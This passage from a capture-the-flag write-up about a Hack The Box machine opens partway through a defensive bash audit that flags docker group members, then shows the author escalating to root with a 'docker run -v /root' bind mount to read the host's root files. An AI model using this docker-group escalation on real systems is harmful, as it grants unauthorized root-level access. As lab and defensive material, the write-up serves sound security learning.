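    gid != "" && $4 == gid { seen[$1] = 1 } # second file: passwd, primary GID
    END { for (u in seen) print u }
  ' "$1" "$2" | sort
}

# Usage: docker_group_clean GROUP_FILE PASSWD_FILE [allowed_user]...
# Returns 0 when only allow-listed accounts are in the group, 1 otherwise.
docker_group_clean() {
  local group_file=$1 passwd_file=$2 allowed u rc=0
  shift 2
  allowed=" $* "
  for u in $(docker_group_members "$group_file" "$passwd_file"); do
    case "$allowed" in
      *" $u "*) ;;
      *) echo "docker group grants root-equivalent access to: $u"; rc=1 ;;
    esac
  done
  return $rc
}

# Constructed sample files (not from the box): prometheus and a CI runner are
# listed in the group, and hephaestus sneaks in through primary GID 999.
SAMPLE_GROUP=$(mktemp) ; SAMPLE_PASSWD=$(mktemp)
trap 'rm -f "$SAMPLE_GROUP" "$SAMPLE_PASSWD"' EXIT
cat >"$SAMPLE_GROUP" <<'EOF'
root:x:0:
sudo:x:27:
docker:x:999:prometheus,ci-runner
EOF
cat >"$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
prometheus:x:1000:1000::/home/prometheus:/bin/bash
ci-runner:x:1001:1001::/var/lib/ci:/usr/sbin/nologin
hephaestus:x:1002:999::/home/hephaestus:/bin/bash
EOF

# On a real host: docker_group_clean /etc/group /etc/passwd ci-runner
docker_group_clean "$SAMPLE_GROUP" "$SAMPLE_PASSWD" ci-runner || true
```

The primary-GID check matters because `getent group docker` only shows the supplementary members; an account created with the docker GID as its login group never appears there but has exactly the same access.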
prometheus@olympus:~$ docker container ls
CONTAINER ID   IMAGE     COMMAND                  CREATED        STATUS        PORTS                                    NAMES
f00ba96171c5   crete     "docker-php-entrypoi…"   8 months ago   Up 13 hours   0.0.0.0:80->80/tcp                       crete
ce2ecb56a96e   rodhes    "/etc/bind/entrypoin…"   8 months ago   Up 13 hours   0.0.0.0:53->53/tcp, 0.0.0.0:53->53/udp   rhodes
620b296204a3   olympia   "/usr/sbin/sshd -D"      8 months ago   Up 13 hours   0.0.0.0:2222->22/tcp                     olympia
prometheus@olympus:~$ docker run -v /root:/tmp/n0w4n -ti rodhes bash
cat: /etc/hostip: No such file or directory
root@09c736226d89:/# 
With docker -v I bind-mounted the host's /root into the container at /tmp/n0w4n.
root@09c736226d89:/# cd /tmp/n0w4n/
root@09c736226d89:/tmp/n0w4n# ls -lah
total 28K
drwx------ 4 root root 4.0K Apr 15  2018 .
drwxrwxrwt 1 root root 4.0K Dec  5 09:05 ..
-rw------- 1 root root    0 Apr 15  2018 .bash_history
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
drwx------ 2 root root 4.0K Apr  2  2018 .cache
drwxr-xr-x 2 root root 4.0K Apr 15  2018 .nano
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-r-------- 1 root root   33 Apr  4  2018 root.txt
root@09c736226d89:/tmp/n0w4n# cat root.txt
[no spoilers]
On entering that container, the host's /root was available under /tmp/n0w4n, readable as the container's root.
And there is the final flag.
Normally I don’t really like CTF minded machines on HTB, but this one was really fun to do.